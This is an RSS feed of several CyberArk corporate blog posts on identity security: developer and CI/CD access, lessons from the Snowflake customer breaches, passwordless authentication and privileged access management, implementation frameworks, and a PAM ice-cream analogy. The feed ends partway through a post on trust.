CyberArk https://www.cyberark.com/ Wed, 24 Jul 2024 16:50:36 +0000 en-US hourly 1 https://wordpress.org/?v=6.5.5 Mission Possible: Securing Developer Access, CI/CD and Code (With Love) https://www.cyberark.com/blog/mission-possible-securing-developer-access-ci-cd-and-code-with-love/ Wed, 24 Jul 2024 16:50:36 +0000 https://www.cyberark.com/?p=195123 heartlock security

Okay, so you’re a security leader at your enterprise – congratulations! It’s a big, challenging role, as you know too well. You or a colleague are likely responsible for securing the cloud and legacy apps that drive critical revenue and customer engagement for your organization. But it’s not just the apps you need to secure. There’s also increased executive scrutiny and interest in ensuring that the build, testing and deployment processes are secure and won’t cause unplanned outages. These are unquestionably big tasks. And you know which teams write and run those cloud apps: the cloud team, platform engineers, DevOps admins and developers.

Understanding Developer and Cloud Team

That’s right, developers, cloud engineers and DevOps admins, how well do you know these teams? How important is security to them? Maybe the question we are asking ourselves is, what do the broader development teams want? It’s fair to say that security will be, at best, one of multiple priorities for many of these teams and roles.

First, developers, cloud engineers and operations all need to access cloud resources and various dev tools to do their jobs, but how much access do they need, and which tools do they need to use vs. administer? Second, developers need to write code and build apps to get the features and capabilities required to market rapidly. And yes, they know their apps need to be secure, but there can be many cases where the development team can be pretty sure the code is secure. But is it really secure? Too often, it isn’t secure because of a lack of secure processes and tools, human error or a process skip.

As security leaders, how well do we understand what it takes to secure developers’ build environments, pipelines and access requirements? What about production environments? How confident are we that we can restrict access to tools, enforce security processes, for instance, and not impact productivity and operations?

Providing Transparent Security Without Burdening Cloud Teams

So, what should we do to ensure the security of dev and cloud environments? In most cases, a mandate from the security team isn’t viable, and even if it is, how well will mandated tools and processes be adopted? You know the answer. But how can we ensure security without burdening developers with new processes and tools? Ideally, we could let them access and use cloud resources and secure secrets using the tools they already use and transparently ensure the tools, access and development processes are secure. By achieving this, security requirements will not burden development teams, and security can ensure that apps and development processes are secure. Providing security while staying out of the way, or at least being minimally visible, helps accelerate acceptance from the development and cloud teams.

Educating Developers: Security As a Pain Reliever (Lessons from A Snowboarder’s Lost Powder Day)

However, developers can also experience much pain and additional work from a security failure. For example, when credentials were stolen from a popular code repository, CircleCI issued an advisory that all credentials should be rotated. With automated rotation, that’s relatively easy, but if the credentials are manually rotated, that’s days of work for developers.

I recently saw this firsthand – one of my snowboarding buddies and developer friend was alerted on the chairlift that his organization’s cloud credentials had been hardcoded and posted to a code repository. Fortunately, it appeared the credentials had not been stolen. His team removed and secured the hardcoded credential…. but didn’t rotate it. Duh, but he’s a developer, not a security person. The attacker got what they wanted with the original credential and stole their cloud resources – even when you delete versions in a code repository, the old versions are still there.

Sadly, my friend lost a powder day on the slopes (we don’t get many of those in New England), development slipped, and dev resources were wasted. It was a huge pain and embarrassment for him and his company – all because a credential was not rotated. The reality is, of course, that security incidents are always painful and never happen at convenient times.

Being Loved by Preventing Pain and Accelerating Development

If we can prevent dev teams from experiencing pain and have devs realize that security has their back, then security teams can be loved! The message to dev teams can be: Keep doing what you’re already doing, and we, security, will help keep you out of trouble! Or, even better, with automation tools, such as automated secrets onboarding from popular dev tools like Terraform, we (security) can help accelerate your development processes.

Now, that’s a win, and it puts security on track to be loved!

Taking a Holistic Approach to Security Avoids Impacting Agility

Let’s dive deeper into how we can deliver transparent security processes. Of course, we’ll need to take a broader perspective. While technology is a key enabler, it’s not just about technology; it’s also about people and processes. Developers want and expect to automate everything they do, so automated security processes are a key requirement.

And, when we talk to development leads, it’s clear they care a lot about security, and their collective voice echoes a common sentiment: “Security is non-negotiable, but it must not come at the cost of our agility and creativity.”

pull quote

Achieving Transparent Security by Addressing People, Processes and Technology

Here are three essential requirements and challenges to consider (as you seek to be loved):

1. Technology. Let dev teams do what they are already doing without needing to change their workflows, processes or tools, or at least to keep any changes to a minimum. Make security transparent to the developer. For example, allow developers and cloud teams access to cloud resources through the cloud providers’ consoles that they are already using while giving the security teams precise, granular controls with zero standing privileges (ZSP)

If developers are already using Kubernetes Secrets or the cloud providers’ built-in (native) secrets vaults such as Azure Key Vault, AWS Secrets Manager or Google Secret Manager for securing their secrets – let developers keep using them while meeting corporate security mandates by transparently giving security teams a centralized view of all the secrets stores across the organization, providing and managing rotation and taking care of audit needs. This eliminates the need for dev teams to be concerned about secrets rotation or logging audit data. Instead, developers can access secrets from the native vaults just like they’ve done before.

While developers continue to access secrets from native vaults as they have always done, it is crucial to explore how centralized security measures can further enhance the protection of these secrets without disrupting existing workflows, as demonstrated in the ESG Showcase for AWS Applications.

2. People. A frequent, key challenge for security teams is working and aligning with the cloud teams. This critical step ensures that while security teams can offer transparent solutions for developers, they will often need to reconfigure access and other permissions to the cloud to deploy these technologies.

In our recently published technical community blog, “Secrets Hub Success: Engaging with Your Cloud Teams,” CyberArk’s professional services team outlines approaches for reaching out and making requests to the organization’s cloud team.

3. Process. Establishing secure automated build environments and processes is a balancing act – what can be done to ensure CI/CD build and development processes are secure without burdening developers? While automation and technology play significant roles, there are also process steps to improve security. For example, security can be strengthened, and any damage limited by approaches such as segmenting access to code bases, automating pipeline creation and forcing destruction after the build so that no credentials can be reused, forcing manual inspection of a pull or merge request by requiring MFA at critical build steps and of course severely restricting access to production environments.

Recognizing these challenges, the webinar titled “Software Development Environments in the Real World: Striking the Right Balance between Security and Innovation” offers insights into practical solutions. CyberArk development and R&D leaders draw upon research from the new book by O’Reilly Media and CyberArk, “Identity Security for Software Development: Building With Identity, Secrets and Credentials,” to address these concerns.

Collaborating with Dev and Cloud Teams – Don’t Force Technology

A holistic approach addressing technology, people and processes is essential to secure development environments and teams. No matter how good it may be, trying to force the latest security technology on dev and cloud teams risks frustration and lagging adoption. Instead, by taking a holistic approach, it is possible to be loved while securing developers’ access, CI/CD pipelines and code – and more “love” will help you drive higher levels of adoption of secure practices.

Partnering and Engaging – Key Approaches

Key elements that security teams have used to partner with development and cloud teams to establish secure build and development processes include:

  • Engaging with developer leads and cloud teams to understand their needs and challenges and to build trust.
  • Identifying and enabling security champions in the cloud and dev teams.
  • Offering flexible security solutions that minimize changes to developer workflows.
  • Providing automation solutions to help development teams maximize their efficiency.
  • Working with DevOps admins and the platform engineering teams to build process steps that boost security without burdening teams and impacting productivity.
  • Fostering a culture of shared responsibility for security. Highlighting potential burdens, such as rotation and audit, for which security is responsible.
  • Continuously educating and updating teams on best security practices.

By taking these steps, we can ensure that security becomes a fundamental part of the development process. This will lead to more secure and efficient development processes for your organization, which benefits everyone involved. And maybe it even generates a little love for you and the security team.

Chris Smith is a director of product marketing at CyberArk.

]]>
CIO POV: Rethinking Data Security Post-Snowflake Customer Attacks https://www.cyberark.com/blog/cio-pov-rethinking-data-security-post-snowflake-customer-attacks/ Wed, 17 Jul 2024 16:50:27 +0000 https://www.cyberark.com/?p=194742

Watching the recent Snowflake customer attacks unfold felt a bit like rewatching a horror movie with predictable attack sequences and missed opportunities to run to safety. But this time, the ending was far more devasting. More than 100 organizations were exposed, and many are now grappling with the impacts of data theft and extortion in what some are calling one of the largest breaches in history.

As I reflect on the widely publicized incident, I keep coming back to the data. Data is what your organization is built on, what sets you apart. How you secure (or fail to secure) your data can dictate your fate. Because threats don’t always knock directly on your door, increasingly, they reach into your tangled web of providers and partners to get to you. To protect your data the lifeblood of your digital business you’ve got to think bigger than your own organization. My top three takeaways from the Snowflake attacks reflect this reality.

1. Info stealers are everywhere and can cause rippling damage. The ShinyHunters group recently claimed responsibility for the Snowflake campaign, alleging that they gained access to organizations’ Snowflake accounts with the help of info stealer malware and an unsuspecting third-party contactor. Snowflake has not publicly confirmed this claim. However, its incident response partners stated that “stolen credentials obtained from multiple info stealer malware infections on non-Snowflake-owned systems were the point of entry for the attacks.”

Info stealers malware designed to steal sensitive information are widely used in credential-based attacks because they’re cheap, readily available and don’t require much technical know-how. Threat actors banking on poor password practices can purchase logs stolen by info stealers to launch targeted attacks that can ripple across supply chains. In the case of Snowflake, they hit the jackpot. Investigators found that 80% of the accounts used in the campaign had prior credential exposure and linked some credentials to infections back in 2020. If that doesn’t prompt organizations to beef up password policies for their employees and third-parties, what will?

2. MFA isn’t optional. Period. Many of these identity-based attacks compromised Snowflake user accounts because the accounts did not require multi-factor authentication (MFA).

Inadequately protected credentials are (still) low-hanging fruit for attackers. As the threat landscape continues to evolve rapidly, MFA is a critical identity security layer, not a “nice to have.” Unfortunately, too many organizations have learned this the hard way, with 25% making (or increasing) investments in MFA and high assurance after an identity-related breach.

Breaking this cycle must start with increased SaaS provider support and can succeed with consistent customer follow-through. Delivering secure solutions isn’t enough; critical SaaS vendors must also empower customers with the right controls and best practices to help them make sound security decisions. For example, SaaS customers should be able to mandate MFA for all user accounts, forgo SMS push notifications for more secure authentication methods to thwart MFA bypass attacks and utilize biometrics to limit the effects of info stealers. In turn, these customer organizations must implement these advanced security controls consistently to reduce the most risk possible.

3.  Default encryption keys jeopardize data security. Lax identity security practices reportedly ignited this recent firestorm of attacks, while data security missteps fanned the flames. Specifically, numerous organizations relied on default encryption keys to protect their data within Snowflake’s platform instead of bringing their own keys.

Bring your own key (BYOK) is a widely accepted best practice for preserving security and centralized control of encrypted data. With BYOK, the customer creates and manages their own encryption keys for the application’s underlying cloud infrastructure (e.g., AWS, Google Cloud or Microsoft Azure). This gives the customer greater control over who and what can access their data within the application, full ownership of the data lifecycle and the ability to revoke the SaaS provider’s access to the keys when required. If an attacker manages to compromise the SaaS provider directly or indirectly the customer’s data will remain encrypted and unintelligible.

Five Steps to Strengthen Data Security in an Interconnected World

[graphical call-out]: In the next 12 months, 84% of organizations will use three or more CSPs, and the number of SaaS applications will grow by 89%. Source: CyberArk 2024 Identity Security Threat Landscape Report

A compromise on one party can lead to a compromise on all. Is your organization prepared for the fallout? In the wake of the Snowflake customer attacks, here are six recommendations for enhancing cyber resilience across your supply chain so you’re ready to face whatever comes next wherever it comes from:

  1. Raise the bar for credential theft. Today’s thriving info stealer market further proves that passwords are the weakest link in the security chain. Make a game plan to secure all employee credentials and enforce an enterprise-wide password policy if you haven’t already done so. Stay current on emerging tactics, techniques and procedures (TTPs) involving info stealer malware and incorporate this threat intelligence into regular cybersecurity training. It may also be a good time to explore how passkeys could help your organization eliminate passwords from authentication workflows.
  2. Strengthen third-party authentication with PAM. Every cloud service provider, SaaS provider and third-party you bring into your digital ecosystem exponentially increases your risk. Your identity security strategy must account for them all. Implement phishing-resistant MFA for outside parties with access to your sensitive data and infrastructure. Mirror privileged access management (PAM) best practices established for internal purposes such as storing privileged identities in a secure repository, isolating and monitoring sessions and provisioning just-in-time (JIT) access to strengthen third-party authentication. Consider a vendor PAM solution that ties into your organization’s existing enterprise PAM solution to help improve efficiency and make it easier to apply policies consistently.
  3. Bring your own key (BYOK). When evaluating cloud-based solutions particularly those involving your sensitive information make sure they support BYOK for data encryption. While BYOK isn’t completely fail-safe, it’s an additional security layer that could potentially halt a dangerous chain reaction through the digital supply chain.
  4. Reduce complexity and gain visibility with SaaS security. Organizations are struggling to maintain visibility across disparate environments. This isn’t due to a lack of cybersecurity tools; 94% already use more than 10 identity-related vendors. Create a plan to consolidate your vendor stack (this may involve deprecating legacy systems) to the best tools for your environment. During this exercise, you may find that SaaS security is the right fit for your business. SaaS security offerings can help you centrally monitor business-critical SaaS programs and systems and gain full visibility on things like risky configurations and potential vulnerabilities. Armed with actionable insights, you can take the proper steps in the right priority order to decrease the attack surface.
  5. Assess critical vendors regularly. The visibility gap extends deep into the digital ecosystem, where risk from third- and fourth-party providers is challenging to evaluate regularly. Instead of trying to do everything all at once, use a SaaS tool or establish a process to prioritize your most critical vendors those who interact with your most sensitive data and assets. Then, establish a regular cadence for complete risk assessments and validation. Once a year is typically a good starting point.

An Incident Response Worth Rewatching

The Snowflake breach reminds us that no organization is immune to attacks while reinforcing the need for constant vigilance at both organizational and digital ecosystem levels. Throughout these difficult weeks, the Snowflake team acted swiftly and communicated transparently. I commend them for their response and the work they’re doing to advance customer cybersecurity protections. May their efforts help fuel a broader push toward security and resiliency standards for all critical SaaS vendors for the benefit of all.

Omer Grossman is the global chief information officer at CyberArk. You can check out more content from Omer on CyberArk’s Security Matters | CIO Connections page.

]]>
What ‘Passwordless’ Really Means for Privileged Access Management https://www.cyberark.com/blog/what-passwordless-really-means-for-privileged-access-management/ Thu, 11 Jul 2024 15:18:34 +0000 https://www.cyberark.com/?p=194459 Digital Padlock Overlaying

Privileged access management (PAM) programs aim to secure the highest-risk access in an organization, including using privileged credentials like passwords, SSH keys and application secrets. So, how can PAM and identity security teams prepare for a passwordless future? The answer lies in a deeper examination of what ‘passwordless’ really means and how PAM programs are modernizing to protect new identities and environments.

While the concept of passwordless authentication is not new, meaningful adoption has only begun in recent years. Several forms of passwordless authentication are gaining traction, ranging from physical authentication factors like USB keys or biometrics to digital factors like QR codes, passkeys and SMS messages with one-time codes. Each method can help efficiently validate a user’s access, which is central to the concept of Zero Trust.

Yet despite the benefits of these authentication formats, passwordless will not replace the need to secure high-risk access – with or without passwords and credentials.

Let’s explore why.

Analyzing Passwordless Authentication Factors

Authentication factors enabling an enterprise identity to connect to a resource are generally divided into three categories:

1. Knowledge factors or something you know.
2. Possession factors or something you have
3. Inherence factors or something you are.

Passwordless methodologies shift the authentication paradigm away from known passwords, a knowledge factor, opting instead to validate access with possession factors (such as a Yubikey or Passkey) and inherence factors (such as biometrics). In many cases, passwordless paradigms don’t truly eliminate passwords but rather abstract the secret away from the end user – just as modern privileged session management capabilities do.

These possession and inherence factors can make user logins faster and more seamless, in alignment with widely trusted standards for passwordless access, such as the FIDO2 Web Authentication (WebAuthN) standard.

Abstracting Passwords Does Not Eliminate Risk

Passwordless authentication factors will certainly reduce risk – but they can still be compromised. For example, biohacking attacks can compromise biometric authentication, while physical theft of Yubikeys and other hardware authenticators negates those standards. Phishing-resistant passkeys are harder to steal than passwords, but attackers can still access a device’s passkey store and use valid passkeys to reach their objectives. Consistent with a Zero Trust mindset, organizations must ‘assume breach’ and realize no authentication factor is safe.

Passwords Authentication Factors

Insider threats will also remain a risk with passwordless authentication. Changing authentication factors to improve user experience does not negate the risk of bad actors inside an organization’s directory or trusted roster of third-party vendors. Simply put, eliminating passwords does not entirely reduce the risk of compromised access.

Organizations will always need defense-in-depth controls to mitigate these risks, even with passwordless authentication paradigms. Tried-and-true PAM concepts like least privilege access, session isolation, privileged session audit and Identity Threat Detection and Response (ITDR) remain essential lines of defense that reduce the risk of identity compromise and lateral movement.

Why We Can’t Fully Replace Passwords – Yet

Today, several operational considerations prevent the full adoption of passwordless authentication. Here are several:

Compatibility. Many systems in an organization will always require passwords by default. For example, every organizational laptop, server and networked device has a built-in local administrator password. These credentials are top targets in ransomware attacks, which generally require local admin rights to execute malware on an endpoint and spread. PAM programs aim to remove these credentials on workstations and manage them securely in a vault.

Security teams lack proven paradigms for replacing these local admin passwords with passwordless authentication factors. The same is true of service accounts and other machine identities, most of which use secrets to authenticate machine-to-machine communications.

Shared account complexity. To reduce their attack surface or satisfy audit requirements, many organizations aim to reduce the number of accounts with access to their most sensitive resources. A common strategy is consolidating on a small number of highly privileged accounts shared by multiple IT and Cloud Ops users. Modern PAM programs then apply several layers of controls to secure these shared accounts. Since these accounts are shared between users, they generally rely on shared knowledge and require knowledge-based authentication factors like credentials.

Modern PAM programs aim to reduce the number of credentials and prevent their exposure to the end user, often obscuring them. In other words, ‘fewer passwords’ is as important as ‘passwordless’ authentication.

In cloud environments where federated access models are popular, some modern PAM programs also reduce password risk by embracing a zero standing privileges (ZSP) approach, creating and deleting entitlements for each privileged session. But even in cloud environments, every organization requires some level of shared privileged access, as the root and registration accounts required to set up a cloud environment can never be decommissioned. These root account credentials will always exist and must be secured with intelligent privilege controls.

Regulatory compliance. Auditors assessing an organization’s cybersecurity compliance with essential regulatory standards often look for defense-in-depth identity security. Some regulations require the use of passwords and careful controls on those passwords, such as implementing least privilege, multi-factor authentication (MFA), policy-based credential rotation and thorough audit visibility of password usage. Eliminating passwords outright can complicate and delay audit processes, ultimately impeding operations.

Backup Access. In emergency situations, passwords serve as a reliable fallback authentication method when passwordless options fail, ensuring users can access their accounts. In fact, many passwordless solutions even rely on credentials (or keys) on the backend. Since keys can be valuable targets for attackers, PAM programs must apply several layers of controls to secure them.

Expectations vs. Reality: Evaluating Passwordless Claims from Security Vendors

Many security vendors – including CyberArk – have smartly introduced passwordless authentication for users accessing their own platforms. However, despite bold claims from some vendors, these technologies cannot replace all passwords, SSH keys and application secrets today.

Identity security leaders are focusing on reducing the core problem – compromised credentials – with modern access models that reduce the number of passwords in play, such as just-in-time (JIT) access. Some technologies create ephemeral accounts and certificates that are not exposed to the end user. Other vendors use agent-based elevation on specific servers, though in this case, the servers still have built-in passwords that must be securely managed.

For these reasons, it’s essential to carefully evaluate claims that any security vendor can deliver a state of passwordless nirvana. The reality is that for the foreseeable future, nearly all organizations will rely on a wide variety of human and machine identities that need passwords to authenticate, making it essential to take a defense-in-depth approach to identity security.

Five Intelligent Privilege Controls for A Passwordless World

Even if we eventually succeed in removing the need for password-based access, heightened controls will still be needed on the highest-risk privileged access. Here are several:

1. Least privilege access. By reducing permissions for identities that authenticate without passwords, organizations can reduce lateral and vertical movement and limit a breach’s ‘blast radius.’ Least privilege is an essential element for a Zero Trust identity security strategy.

2. Session isolation. A passwordless world would still be plagued by ransomware and other forms of malware. Using proxy servers and bastion hosts to isolate highly privileged sessions helps prevent malware-compromised devices from reaching enterprise resources.

3. Session audit and screen recording. Regardless of how compliance requirements may evolve beyond passwords, organizations will need to review high-risk user activity and investigate potential incidents. To maximize the efficiency of audits, organizations will need a central review of end user sessions across long-lived systems, cloud workloads and services and web apps.

4. ITDR. Although proactive efforts are being made to reduce passwords, security teams will still need to detect malicious or anomalous behavior that could signal in-progress attacks – especially on their identity infrastructure. ITDR capabilities from leading identity security vendors can use AI and machine learning to detect known indicators of malicious access while flagging incidents to the security operations center (SOC) for automatic response and remediation.

5. Access with zero standing privileges. Even without passwords, organizations must reduce post-authentication risk. Organizations can reduce the blast radius of an attack by removing standing privileges and instead creating and deleting specific entitlements for specific users and sessions. A true ZSP posture requires that permissions are created and assigned on the fly and removed after use, with granular control of crucial TEA (time/duration, entitlements, approval) settings.

 

Interested in learning more about how modern PAM programs secure IT, third-party and cloud operations teams? Register for our upcoming webinar.

 

Sam Flaster is a director of product marketing at CyberArk.

]]>
Why Implementing Identity Security Doesn’t Have to Be Complicated https://www.cyberark.com/blog/why-implementing-identity-security-doesnt-have-to-be-complicated/ Wed, 10 Jul 2024 17:28:22 +0000 https://www.cyberark.com/?p=194400 Feature image of a modern automatic transmission gear shift for blog that compares simple identity security implementation is like driving a car with an automatic transmission, compared to complex implementation, which is like driving a manual transmission car.

Every organization is different, with its own unique needs, challenges and goals. That means that IT solutions, and especially IT security, must be complex tools that are highly configurable and adaptable to various scenarios. IT security solutions must be flexible and robust enough to handle many situations. They must support complex organizational structures, geographical dispersion, local law implications, vast and diverse technology stacks, multiple platforms, services and applications, a spectrum of threat models or different levels of resources.

Identity security is no exception, as it deals with one of the most critical aspects of any organization: the identities and access rights of its users and devices. However, identity security is not only a complex and flexible tool but also a vital and urgent one. The traditional perimeter-based security model is no longer sufficient in the era of cloud computing, remote work and mobile devices. Users and devices can access sensitive data and resources from anywhere, anytime and on any platform. This means that the identity and access management (IAM) policies and practices must be more granular, dynamic and context-aware, considering factors such as location, device type, network, behavior and risk level.

Moreover, identity security has to cope with the growing sophistication and frequency of cyberattacks, especially those that target user credentials and access rights. According to Verizon’s 2024 Data Breach Investigations Report (DBIR), 76% of all breaches (Nov. 2022 through Oct. 2023) included the human element, with people involved through privilege misuse, use of stolen credentials, social engineering – or error. Three of these methods are directly linked to users’ identities. Attackers increasingly use phishing, credential stuffing, password spraying and brute force to gain unauthorized access to organizations’ assets and data. Today, they don’t hack in; they log in.

Therefore, identity security must detect and prevent such attacks using security-first access management, intelligent privilege controls and flexible identity governance and administration (IGA). However, the intricacies of configurations, interoperability and the need for a seamless identity security fabric raise the bar and demand a high level of expertise and experience from the defenders. Implementing identity security to secure your organization is a challenging task, and it has many pitfalls and nuances that can make or break your security posture.

pull quote: "Navigating the complex landscape of identity security is akin to driving a high-performance vehicle on a racetrack: it requires precision, adaptability and the right tools for the job."

Implementing identity security can seem as daunting as learning to drive a stick shift in a world where automatic transmissions are the norm. However, just as mastering a manual transmission can offer a driver more control and a better feel for the car, embracing the complexities of identity security can provide organizations with a more robust and nuanced defense against cyberthreats.

Avoiding the Pitfall of Oversimplified Identity Security Solutions

One might be tempted to look for a quick and easy way out of this daunting challenge. Instead of investing in a comprehensive and sophisticated identity security solution that can handle the complexity and diversity of today’s IT environments, one might opt for a patchwork of more straightforward and cheaper solutions that cover only basic use cases and don’t require much customization or integration. This might seem like a smart and cost-effective approach, but it comes with a high price: security gaps and vulnerabilities.

By relying on multiple disjointed solutions that don’t communicate or coordinate with each other, one creates a siloed and inconsistent security posture that leaves many blind spots and weak points for attackers to exploit. Moreover, one exposes the organization to unnecessary and avoidable threats by settling for simplistic solutions that don’t offer the granularity and flexibility needed to adapt to the changing context and risk level. For example, an endpoint least privilege solution that doesn’t support adaptive multi-factor authentication (MFA) might allow an attacker to wait for the right moment to bypass the login process with stolen or weak credentials.

A solution that doesn’t manage privileged access or lacks flexible IGA will undoubtedly have overprivileged users and an uncontrolled attack surface, failing to combat insider threats or lateral movement. A solution that doesn’t enable security-first access management or intelligent privilege controls might fail to detect and prevent anomalous or malicious behavior, such as accessing sensitive data from an unusual location or device.

Returning to my earlier analogy – navigating the complex landscape of identity security is akin to driving a high-performance vehicle on a racetrack: it requires precision, adaptability and the right tools for the job. Just as a race car driver wouldn’t rely on an automatic transmission for the nuanced control needed on the track, security teams need sophisticated identity security solutions that offer granular control and can adapt to the ever-changing threat environment.

An automatic transmission is great for a grocery run but won’t get you far on a racetrack.

Applying Frameworks to Overcome Identity Security Complexity

A much better and more strategic way to overcome the steep learning curve and resource requirement issue with comprehensive enterprise-grade solutions is to rely on built-in frameworks and templates that provide guidance and best practices for implementing a robust and comprehensive identity security solution. One example is default policies that can be easily activated and instantly improve security posture. These policies can cover common scenarios and use cases, such as password management, least privilege enforcement, access control and session monitoring. Implementing these policies can help avoid the hassle and complexity of creating them from scratch while benefiting from their protection and compliance. Better yet, built-in frameworks help hit the ground running and allow for the continuous evolution of security measures.

Such intuitive frameworks support a seamless transition to role-based least privilege policy development, accommodating the organization’s unique pace and needs. These built-in frameworks and templates are essential tools, simplifying the identity security journey while ensuring high-quality and effective outcomes. Although the intricacies of identity security are complex, the tools to implement it do not have to be.

Embracing the shift toward a more secure digital environment, CyberArk’s QuickStart framework offers a streamlined approach to identity security that now extends to macOS users. Read our comprehensive whitepaper to learn about QuickStart, a rapid risk reduction and least privilege framework available in CyberArk Endpoint Privilege Manager. The framework can help reduce the attack surface on endpoints and servers and lay the foundation for role-based least privilege policies in just a couple of clicks.

Andrey Pozhogin is a senior product marketing manager at CyberArk.

]]>
Serving Secure Access: Inside the Privileged Access Ice Cream Parlor https://www.cyberark.com/blog/serving-secure-access-inside-the-privileged-access-ice-cream-parlor/ Mon, 01 Jul 2024 16:20:10 +0000 https://www.cyberark.com/?p=193474 rainbow ice cream

Imagine standing in your favorite ice cream parlor, gazing at myriad flavors chilling behind the counter. The choices are tantalizing, from traditional vanilla and chocolate to a swirl of the two. Ice cream flavors have evolved from these bases into cookies and cream, mint chocolate chip, Neapolitan, birthday cake, Rocky Road, butter pecan and coffee – you get the picture.

Ice cream is a lot like privileged access management (PAM) solutions. Both rely on foundational elements: vaulting and rotating credentials, isolating high-risk sessions and auditing actions taken with privileged accounts. These controls, like vanilla and chocolate, are essential for a successful, scalable PAM program.

But what happens when the basics no longer suffice?

Just as ice cream comes in multiple flavors, building a PAM solution that fits your organization’s needs can help reduce the attack surface as your ecosystem expands.

Scooping the Basics: PAM’s Fundamental Flavors

In the world of ice cream, as in PAM, the classics serve as the cornerstone for creativity. Vanilla, chocolate and swirl are not just timeless favorites; they are the essential foundations upon which all other flavors are built. Similarly, in any PAM practice, the basics of vaulting credentials, rotating them regularly and isolating and monitoring privileged sessions are the bedrock upon which a secure and scalable program is constructed. Let’s scoop into the details:

  • Password Vaulting: It’s a classic favorite, like vanilla ice cream. It ensures that privileged account credentials are securely stored and managed, preventing unauthorized access and reducing the risk of credential theft.
  • Credential Rotation: Chocolate ice cream and credential rotation are timeless. Regularly changing privileged account passwords mitigates risks associated with compromised credentials.
  • Session Monitoring and Isolation: Combining vanilla and chocolate into a swirl, session monitoring and isolation provide visibility into privileged sessions, allowing organizations to monitor activities and isolate risky or unauthorized actions.

These foundational privilege controls are crucial but are just the beginning of a holistic PAM solution. Just as chocolate and vanilla can be enjoyed on their own, these basics lay the groundwork for modernizing a PAM strategy with additional “flavors.”

The diagram below represents how foundational and modern PAM controls come together to optimize privilege controls beyond built-in, vaulted credentials.

PAM controls with access

Sprinkling in Innovation: PAM’s Modern Flavors

Just as the classic flavors of vanilla, chocolate and swirl lay the groundwork for an endless variety of ice cream experiences, the foundational components of PAM – password vaulting, credential rotation and session monitoring – set the stage for a more sophisticated suite of security features. As we delve into the modern PAM flavors, we’ll discover how these essential elements evolve to meet the complex demands of today’s threat landscape. These flavors (aka components) are:

  • Expanded Scope and New-Environment Coverage (Cookies and Cream): Like cookies and cream adds texture and complexity to vanilla, modern PAM solutions secure access not only to traditional systems but also to cloud workloads, DevOps tools, robotic process automation (RPA) and internet of things (IoT) devices.
  • Modern Session Management and Monitoring (Cookie Dough): Advanced session management and monitoring features, akin to cookie dough ice cream, take privileged access visibility to new heights with keystroke logging, video recording and real time session monitoring.
  • Robust Risk Analytics and Reporting (Rocky Road): Like Rocky Road, which combines chocolate, marshmallows and nuts for complexity, modern PAM solutions offer robust risk analytics and reporting capabilities, analyzing user behavior and detecting potential threats.
  • Seamless Integration and Automation (Mint Chocolate Chip): Mint chocolate chip blends refreshing mint with decadent chocolate chips. Similarly, seamless integration and automation features in PAM solutions streamline operations and reduce human error by integrating with other security tools.
  • Support for DevOps and Agile Methodologies (Strawberry Cheesecake): Just as strawberry cheesecake combines unique flavors, modern PAM solutions support DevOps and agile methodologies with features like just-in-time (JIT) access provisioning and automated secrets management.
  • Scalability and Flexibility (Neapolitan): Neapolitan ice cream offers three flavors in one package. Modern PAM programs provide scalability and flexibility, supporting large-scale deployments and hybrid and multi-cloud environments.

A modern PAM program combines foundational aspects with modernized features, holistically reducing risk and managing privileged access. Like ice cream, PAM is versatile and should be integrated into various security strategies.

The PAM Sundae: A Staple Security Treat

As we layer our PAM Sundae with a variety of security measures, let’s explore the key components that make up this complete treat. Each element not only adds its own unique flavor but also enhances the overall protection, just like the perfect blend of toppings on a sundae. Here’s a taste of what makes our PAM strategy so satisfying:

  • Securing Developers (Apple Pie à la Mode): Just as Apple Pie à la mode elevates a classic dessert, PAM solutions secure developer access to critical systems, managing secrets and integrating with DevOps tools.
  • Secrets Management (Milkshake): A milkshake becomes indulgent with ice cream, just as modern PAM programs enhance security with robust secrets management for API keys, database credentials and encryption keys.
  • Remote Access Management (Affogato): An affogato combines hot espresso and ice cream. Similarly, modern PAM solutions provide secure remote access for contractors and third-party users, enforcing least-privilege principles.
  • Machine Identity Management (Banana Split): Like a banana split combines multiple flavors and toppings, machine identity management in PAM secures public key infrastructure, server certificates, SSH keys and other non-human credentials.
  • Endpoint Privilege Management (Baked Alaska): Baked Alaska combines sponge cake and ice cream in a meringue shell. Endpoint privilege management in PAM controls administrative rights and applications while enforcing least privilege policies on endpoints.
  • Workforce Identity Management (Ice Cream Sandwich): Ice cream sandwiches are convenient and delicious. PAM solutions integrate with workforce identity management to secure access for employees, contractors and third-party users to ensure security for all identities inside and outside of the organization.

PAM Delights: The Cherry on Top of Security

Modernizing your PAM practice involves securing built-in admin accounts with vaulting and rotating credentials and extending these controls to federated access and roles with JIT access models, zero standing privileges (ZSP) and web session protection. Including secrets management, enforcing least privilege on workstations and servers, managing machine and non-human identities and securing the workforce are essential for a comprehensive modern PAM program.

To wrap up our journey through the Privileged Access Ice Cream Parlor, we’ve savored a variety of PAM flavors that together create a robust security strategy. From the solid base of password vaulting and credential rotation to the delightful toppings of advanced session management and risk analytics, each element adds its own singular flavor to the mix. Like a sundae without a cherry on top, a comprehensive PAM program isn’t complete without integrating workforce identity management and securing the workforce. It’s the final touch that brings all the flavors together, creating a treat that’s not only irresistible but also ensures that every scoop is secure.

Ryne Laster is a product marketing manager at CyberArk.

]]>
Identity Security: The Keystone of Trust https://www.cyberark.com/blog/identity-security-the-keystone-of-trust/ Tue, 25 Jun 2024 15:39:39 +0000 https://www.cyberark.com/?p=193053 Identity Security Trust

A few weeks ago, my wife asked me why stopping threat actors from impacting our lives is so difficult. In this digital age, the necessity to connect online brings inherent exposure to vulnerabilities. The challenge for you as a security leader lies in reducing the sense of vulnerability by building trust. You need to protect your organization and reassure employees so they can perform their jobs without fear.

Whether you are a chief information security officer (CISO) with the best security solutions available or an identity and access management (IAM) leader with just enough security practices, the effectiveness of any security program is limited without the trust of the organization’s stakeholders. Trust is the cornerstone for achieving higher security maturity.

Take, for example, the credit card anti-fraud teams that call to verify suspicious purchases. Regardless of the explanation, customers feel protected when anti-fraud teams contact them and continue to trust and use their cards. Similarly, security leaders must cultivate the trust of stakeholders and end users to reduce their sense of cyber vulnerability and foster digital progress.

Cultivating Trust: Leadership Principles in Action

In a digital era marked by increasing connectivity and threats, CISOs’ and other security decision-makers’ roles have evolved beyond implementing security technologies to building fundamental trust within their organizations. According to the CyberArk 2024 Identity Security Threat Landscape Report, 93% of organizations have experienced identity-related security breaches in the past year, underscoring the trust in the organization’s security program.

Cultivating Trust quote

